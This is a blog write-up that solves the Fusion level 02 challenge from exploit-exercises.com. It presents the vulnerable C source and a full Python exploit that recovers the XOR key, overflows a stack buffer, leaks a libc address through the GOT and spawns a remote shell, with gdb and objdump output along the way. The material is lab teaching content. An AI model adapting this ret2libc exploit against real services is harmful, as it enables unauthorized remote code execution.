Wednesday, August 17, 2016

Exploit Exercises Fusion Level 02 Writeup

In this first post, we're going to exploit level 02 of Fusion from exploit-exercises.com. We will see how we can leverage a buffer overflow vulnerability, to find our way into the much desired shell. If you haven't already, download the fusion live cd ISO image, and boot it with Virtualbox or any other virtualization software you have.

First of all, let's see the source code of the challenge, and point out a few important things.



#include "../common/common.c"    

#define XORSZ 32

void cipher(unsigned char *blah, size_t len)
{
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
      int fd;
      fd = open("/dev/urandom", O_RDONLY);
      if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE);
      close(fd);
      keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
      blahi[j] ^= keybuf[j % XORSZ];
  }
}

void encrypt_file()
{
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");
  
  loop = 1;
  while(loop) {
      nread(0, &op, sizeof(op));
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz));
              nread(0, buffer, sz);
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
  }
      
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);

  encrypt_file();
}



A Short Walkthrough


Let's start by looking at main(). It looks to be serving at a specific port, and upon receiving a connection, it calls encrypt_file(). The binary for this level (as with all other levels) is located at /opt/fusion/bin/level02. Normally all levels follow a pattern: level01 listens to port 20001, level02 listens to port 20002, but for the tutorial's sake, let's see what port it is listening to:

fusion@fusion:~$ sudo lsof -i | grep level02
...
level02   1471    20002    3u  IPv4  12112      0t0  TCP *:20002 (LISTEN)


As we can see, it is indeed listening to port 20002. Let's now take a look at encrypt_file(). It is the landing function when connected to the host. Basically what the function does is, it has an a loop which initially accepts a single char, which can be either 'E' or 'Q'.  'Q' makes the function return, while 'E' is used to encrypt our data with the key the server has generated.

If we choose to encrypt data, the server requires that we send an integer which is equal to the length of the plaintext, followed by the plaintext itself. nread() is used to read data from us, with the first parameter being 0, which stands for STDIN, the second parameter being the place where to store the value being read, and the third parameter being the size of the data to read. After the data is encrypted, the server will write to us back in a similar fashion the size of the encrypted data, followed by the data itself. nwrite() is used to write data back to us, with the only difference being that the first parameter is now 1, which stands for STDOUT. Then the loop restarts.

The only function we haven't yet seen is cipher()The cipher() function may seem a little daunting at first, but all it really does is, it xor encrypts our data with a randomly generated key. Moreover, the key doesn't change for the lifetime of the connection. The key is of type int[32], and it encrypts our data in blocks of 128 bytes.

Time to talk about the fun part: the vulnerability.  But, by now, you must've spotted the vulnerability. If not, please do not continue reading until you find out where the vulnerability is.

So, as you have already noticed (you did follow my advice, didn't you?) the vulnerability is that buffer has a size of 131072 bytes, but all nread() cares about is the size of the data we send to it, thus allowing us to overflow the buffer as we please.



Getting Control of EIP


We have reviewed the source code of the vulnerable program, and we also showed why the program was vulnerable. Now we are going to exploit this vulnerability, by first doing the simplest thing you can do to a vulnerable program: crash it. To do this, we are going to overwrite the return address of the encrypt_file() function with an invalid address. However, we have just a minor obstacle in front of us.

Sure enough, sending a sufficiently large plaintext to encrypt, will crash the server. However, we want to be able to alter the server's state in a meaningful way, thus we need to take account of the encryption.

Let's just lay a little bit of foundation for the exploit we will be writing. 


import socket
from struct import pack, unpack
import telnetlib

def connect(host='localhost', port=20002):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s


def consume_welcome_message(fd):
    welcome_message = "[-- Enterprise configuration file encryption service --]\n"
    
    # return the message if needed for debugging purposes
    return fd.read(len(welcome_message))

def send_quit(fd):
    fd.write('Q')

def encrypt_data(fd, data):
    """this function sends data for encryption to the server. returns the encrypted data"""
    fd.write('E' + pack('<I', len(data)) + data) 
    success_message = "[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\n"
    fd.read(len(success_message)) # ignore the encryption complete message
    encrypted_data_len, = unpack('<I', fd.read(4))
    return fd.read(encrypted_data_len)

def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    encrypted_test = encrypt_data(sock_fd, 'test data to encrypt')

if __name__ == '__main__':
    main()


We wrote a set of functions which will help us to develop the exploit later on. The file descriptor is used instead of the socket in order to avoid calling recv() repeatedly when trying to read fixed length data.


Retrieving the Encryption Key


I know it is beginning to look like a really long journey, but believe me, we will soon get to the fun part. Now let's dive a little bit deeper into what happens when we send the data to encrypt to the server. Right after the server receives the data, a call to cipher() follows. By carefully inspecting cipher(), we can deduce that the function encrypts the buffer in place, then the same buffer is sent back to us. Also, remember that as long as we keep the same connection to the server, the encryption key will remain the same. 

Xor encryption is a very simple one. The way it works, makes it really easy to retrieve the original key if we have the plaintext and the ciphertext. Since we already have the plaintext, and we also get the ciphertext back when encrypting the data, we can easily retrieve the key. Let's now write the methods necessary to perform xor encryption and to retrieve the key.



def xor(value, key):
    # isn't python a joy?
    return ''.join([chr(ord(e) ^ ord(key[i % len(key)])) for i, e in enumerate(value)])

def retrieve_key(fd):
    dummy_data = 'A' * 128
    return xor(dummy_data, encrypt_data(fd, dummy_data))


There we have it. We wrote our xor encryption routine, and also a method to retrieve the encryption key. 



Back to Owning EIP


Alright, we now can retrieve the encryption key with which the server is encrypting the data we send. As I previously mentioned, xor has a very nice property:

If A xor B = C, then A xor C = B, and also B xor C = A.

So if we encrypt the encrypted data, we get back the original plaintext. Get it? If we encrypt the data before sending it, the cipher() function will actually decrypt the data, effectively leaving our original data in memory.

So now we are free to own the EIP as we wish. We know that the buffer's size is 131072 bytes. So we need to add a few more bytes in order to enjoy our first victory.

Let's write a method to do just that.



def crash_server(fd, key, bufsize=131072):
    junk = 'A' * 131072 # this will fill the buffer completely
    overwrite = 'AAAABBBBCCCCDDDDEEEEFFFF'
    data = xor(junk + overwrite, key)
    encrypt_data(fd, data)
    send_quit(fd)

# let's change our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    crash_server(sock_fd, key)

So we wrote the crash_server() method, which takes the socket file descriptor and the encryption key, and sends a payload which should crash the server by setting EIP to a bogus address. We first send the data by calling the encrypt_data() method, then we send 'Q' to make the encrypt_file() function in the server return to our overwritten address. Let's see if 24 bytes are enough to overwrite the return address.

So, we run the script, and...well, nothing. We need to check the logs:

fusion@fusion:~$ dmesg | tail
[...]

[104449.594025] level02[11212]: segfault at 45454545 ip 45454545 sp bfd93020 error 14

Oh boy...it looks like the server crashed at EIP 0x45454545. If your ASCII is a little bit rusty, you can verify that 0x45 (or 69 decimal) belongs to the character E. So we can deduce that 16 bytes beyond the buffer, we start overwriting the return address. 



An Arbitrary Read Primitive


So far we have taken control of EIP, meaning we can make execution flow to an address we wish. But we have two protections to defeat: NX & ASLR. They work very well in conjuction, but the moment we beat ASLR, NX becomes pretty weak. We now get to the harder (and more fun) part of exploitation. In order to beat ASLR, we either have to bruteforce it (yuck!), or find a way to leak a memory address which will then be used to find out other addresses of interest. The latter is what we are going to do now.

In order to leak information from memory, we need a way to get that data to us. I hear what you are saying...the answer is nwrite(). This function reads from a specific address, and writes that data to us via the socket connection. But, what to read? Before we move on to read from an actually useful address, we are going to read the string "Enterprise" from the server, to make sure that things are working.

In order to setup the exploit, we first need a few things. Let's load the level02 binary in gdb and find the address of nwrite() and the address of the "Enterprise" string.

fusion@fusion:~$ gdb /opt/fusion/bin/level02
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /opt/fusion/bin/level02...done.
(gdb) p &nwrite

$1 = (ssize_t (*)(int, void *, size_t)) 0x80495a0 <nwrite>

So we can see that nwrite() resides in address 0x80495a0. Now we need to find the address of the string "Enterprise". We know that the function encrypt_file() prints the welcome message when first called. So let's disassemble that function and see what we can find.

(gdb) disas encrypt_file
Dump of assembler code for function encrypt_file:
   0x080497f7 <+0>:     push   %ebp
   0x080497f8 <+1>:     mov    %esp,%ebp
   0x080497fa <+3>:     sub    $0x20028,%esp
   0x08049800 <+9>:     movl   $0x8049e04,(%esp)
   0x08049807 <+16>:    call   0x8048930 <puts@plt>

Just at the top of the function, we can see a call to puts(). The source code shows that the code actually calls printf(), but maybe the compiler has optimized it to use puts() since it contains just a simple string and no formatting. So we have no choice but to see what is the value in the only parameter that is passed to puts(), that is 0x8049e04.

(gdb) p (char*) 0x8049e04

$3 = 0x8049e04 "[-- Enterprise configuration file encryption service --]"

And sure enough, there is our warm welcoming message. So our welcoming message is at address 0x8049e04, but we want to get only the string "Enterprise", not the whole string. So the address we need is 0x8049e04 + 4, to skip the first 4 characters, which gives us 0x8049e08.

So we know the address of the function we are going to call, we know the address of the data we are going to read (and its size), now we are missing only one piece of the puzzle: How? To answer that question, we need to take a look at how the stack is laid out when we  crash the server with the proof-of-concept code we wrote above where we overwrote the return address with 0x45454545

As we found out previously, there was a gap of 16 bytes between the buffer and the saved return address. So the stack looked something like below: (hint: you can verify by attaching gdb to the running process)

 ----------------------
|    return address    |
 ----------------------
|   saved ebp address  |
 ----------------------
|   unknown (4 bytes)  |
 ----------------------
|   unknown (4 bytes)  |
 ----------------------
|   unknown (4 bytes)  |
 ----------------------
| buffer (131072 bytes)|
 ----------------------

Then, after sending the data to encrypt (which overflowed), the stack became like below:

 ----------------------
|      0x45454545      | <-- EEEE
 ----------------------
|      0x44444444      | <-- DDDD
 ----------------------
|      0x43434343      | <-- CCCC
 ----------------------
|      0x42424242      | <-- BBBB
 ----------------------
|      0x41414141      | <-- AAAA
 ----------------------
| buffer (131072 bytes)| <-- filled with A's
 ----------------------

So far so good. We know that we need to replace the return address with the address of nwrite(). How about its parameters? Well, it makes sense to discuss a little bit how a function is called in ASM by using nwrite() as an example. Normally we would push the arguments first, starting from the rightmost argument to the first, and then call the function. Here's how it would be in code:


push $10        ; push the length of the string (3rd argument)
push $0x8049e08 ; push the address of the string Enterprise (2nd argument)
push $1         ; push STDOUT (1st argument)
call 0x80495a0  ; call nwrite


Moreover the call instruction could also be written as:


push return_address ; address nwrite will return to, when done
jmp 0x80495a0       ; jump to nwrite to execute the function


So, in order to execute the nwrite() function, we need to write 4 values after overwriting the return address, in the reverse order in which they are pushed to the stack in the code snippet above. Armed with this information, let's change our Python script so that it tries to read the string we want.


def test_arbitrary_read(fd, key, param_addr, param_size):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    nwrite_return = 0xdeadbeef
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', nwrite_return)
    payload += pack('<I', param_stdout)
    payload += pack('<I', param_addr)
    payload += pack('<I', param_size)
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    print fd.read(10) # must print Enterprise

# let's change main
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    test_arbitrary_read(sock_fd, key, 0x8049e08, 10) # read 10 bytes from 0x8049e08 and print them

Alright, we have our code all set up. We do the usual connect() call, followed by the method that consumes the welcome message, next we retrieve the key, and we finally call our arbitrary read method. Since we have decided that nwrite() will return to 0xdeadbeef, it means that we should also check the logs to see if the server will crash at that address or not. Now let's run it.

fusion@fusion:~$ ./exploit.py
Enterprise

Nice! It seems we were able to read that sought after "Enterprise" string. Let's also inspect the logs to see if there is any crash:

fusion@fusion:~$ dmesg | tail
[...]
[173049.114112] level02[16997]: segfault at deadbeef ip deadbeef sp bfd93024 error 15

As expected, we have our controlled demolition right there, at 0xdeadbeef, as promised.


In GOT We Trust


We now have an arbitrary read primitive, which we can use to leak an address. This is such a great victory. The next step is also an important step, which relies on our ability to read arbitrarily from the memory of the victim process. Our plan is as follows:
  1. Leak the address of a function from libc and use this address to compute the ASLR offset.
  2. Use the address above to deduce the address of execve(), and the address of the string "/bin/sh".
  3. Construct the shell payload.
  4. Profit!
We're at step 1 right now, so we need to determine the function whose address we are going to leak. Before we get to that, let's just give a brief overview of how the program the addresses of libc functions. Basically, there is something called the Global Offset Table (GOT), which serves like a list of addresses. The basic idea is that this table contains the address where the address of a certain function in libc will be stored in runtime. It's as if the GOT were saying to us that, the address of function printf() at runtime will be stored in 0xcodebabe. So if we were to read what is stored in 0xcodebabe at runtime, we would find another address, say 0xaabbccdd. 0xaabbccdd would be the address of printf() at runtime. We can use the objdump tool to view the GOT entry for a function:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02

/opt/fusion/bin/level02:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
0804b368 R_386_GLOB_DAT    __gmon_start__
0804b420 R_386_COPY        __environ
0804b424 R_386_COPY        stderr
0804b428 R_386_COPY        stdin
0804b440 R_386_COPY        stdout
0804b378 R_386_JUMP_SLOT   setsockopt
0804b37c R_386_JUMP_SLOT   dup2
0804b380 R_386_JUMP_SLOT   setresuid
0804b384 R_386_JUMP_SLOT   read
0804b388 R_386_JUMP_SLOT   printf
[...] other entries follow

So, at runtime, 0x804b388 will contain the address to printf(). But it doesn't end here. The value will be populated with the correct printf() address only after it has been called for the first time. For that reason, we also have PLT, the Procedure Linkage Table. The program works directly with the PLT. So if our program wants to call printf(), it will actually call a small stub called printf@plt(). If we try to disassemble the printf() function in gdb, we will end up disassembling this stub. Let's give it a try:

(gdb) disas printf
Dump of assembler code for function printf@plt:
   0x08048870 <+0>:     jmp    *0x804b388
   0x08048876 <+6>:     push   $0x20
   0x0804887b <+11>:    jmp    0x8048820
End of assembler dump.

It looks like the stub doesn't do much. The first line of the stub jumps to the address stored in 0x804b388. That looks like the GOT entry for printf(). Let's inspect that address with gdb:

(gdb) x *0x804b388
0x8048876 <printf@plt+6>:       0x00002068

So 0x804b388, which is the GOT entry for printf(), actually contains 0x8048876, which is the second instruction in the printf@plt() stub. The two other instructions of the stub, will basically call the resolver, which will resolve the real address of printf(), and also update its GOT entry, so that the next time it is accessed there will be the address of the printf() function.

This information was provided so that we know what to look for, and why. Specifically, we are looking for a function about which we are 100% percent that it will have been called at least once, so that the address we leak from its GOT entry is the address of the function. For this reason, we will choose the function puts(). If you remember, we show that puts() is called instead of printf() above, when we disassembled the first instructions of the encrypt_file() function. Now we need the GOT entry address for puts(). We can find it out by using objdump:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02 | grep puts
0804b3b8 R_386_JUMP_SLOT   puts

So, in order to leak the address of puts() in runtime, we need to read the value stored in 0x804b3b8

Digging Our Way Towards the Shell


We theoretically solved the first step in our checklist (introduced in the section above), and we are now very close to getting to the shell. Let's first find out the addresses of execve() and "/bin/sh" relative to puts().

fusion@fusion:~$ ps -ef | grep level02
20002     1471     1  0 Aug15 ?        00:00:00 /opt/fusion/bin/level02
fusion   18773  2023  0 23:28 pts/1    00:00:00 grep --color=auto level02
fusion@fusion:~$ sudo gdb /opt/fusion/bin/level02 --pid=1471
[sudo] password for fusion:
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
[...]
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7730424 in __kernel_vsyscall ()
(gdb) find &system, &system+100000000, "/bin/sh"
0xb76e08da
warning: Unable to access target memory at 0xb7722f62, halting search.
1 pattern found.
(gdb) find &system, &system+10000000, "/bin/sh"
0xb76e08da
warning: Unable to access target memory at 0xb7722f62, halting search.
1 pattern found.
(gdb) x &puts
0xb76083b0 <_IO_puts>:  0x8920ec83
(gdb) x &execve
0xb7643910 <__execve>:  0x8908ec83

So we first found the pid for level02, we attached gdb to the process, and now we will use the addresses we found to compute the offset from puts() for execve() and "/bin/sh".

execve_offset = 0xb7643910 - 0xb76083b0
binsh_offset = 0xb76e08da - 0xb76083b0

We will use these offsets in our exploit payload. Now the plan is to first leak the address of puts(), then redirect execution from nwrite() to encrypt_file() again. We will overflow the buffer in encrypt_file() again, this time issuing a call to execve("/bin/sh", NULL, NULL) and thus launching the shell. Let's waste no time and write ourselves an exploit:


def exploit(fd, key):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    encrypt_file = 0x080497f7 # address of encrypt_file() we got from gdb
                              # in the arbitrary read primitive section
    puts_got_entry = 0x804b3b8 
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', encrypt_file)
    payload += pack('<I', param_stdout)
    payload += pack('<I', puts_got_entry)
    payload += pack('<I', 4) # 4 = size of address
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    
    puts_address, = unpack('<I', fd.read(4))
    
    consume_welcome_message(fd) # welcome message is printed again
    
    execve_offset = 0xb7643910 - 0xb76083b0
    binsh_offset = 0xb76e08da - 0xb76083b0
    
    payload = junk_len * 'A'
    payload += pack('<I', execve_offset + puts_address)
    payload += pack('<I', 0xdeadbeef)
    payload += pack('<I', binsh_offset + puts_address)
    payload += pack('<I', 0) # two NULL
    payload += pack('<I', 0) # arguments
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # spawn the shell


# now changes to our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    
    # after this method call the shell will be listening for our commands
    exploit(sock_fd, key)
    
    # we use telnetlib to interact with the shell
    t = telnetlib.Telnet()
    t.sock = sock
    t.interact()

Our main method now calls the exploit method, and then we can see we use the interact() method of a Telnet object. Since the victim program's I/O is connected to the socket, and we expect to have executed the execve("/bin/sh", NULL, NULL) command, the shell should be listening for our commands from the socket. The Telnet object, given the socket, abstracts the boring stuff from us, and provides to us a simple interface to issue commands.

If everything went well, executing that script should give us a shell prompt:

fusion@fusion:~$ ./exploit.py
id

uid=20002 gid=20002 groups=20002

As we can see, after running the script, it doesn't exit. Instead, it is waiting for us to input a command. We give the command id, and we get the uid, gid and groups with a value of 20002, meaning we have successfully exploited level02 and gained shell access. Congratulations!

You can also find the exploit on GitHub. There are minor changes compared to the code in here, but the basics remain the same. 

I'd love to hear your thoughts on this.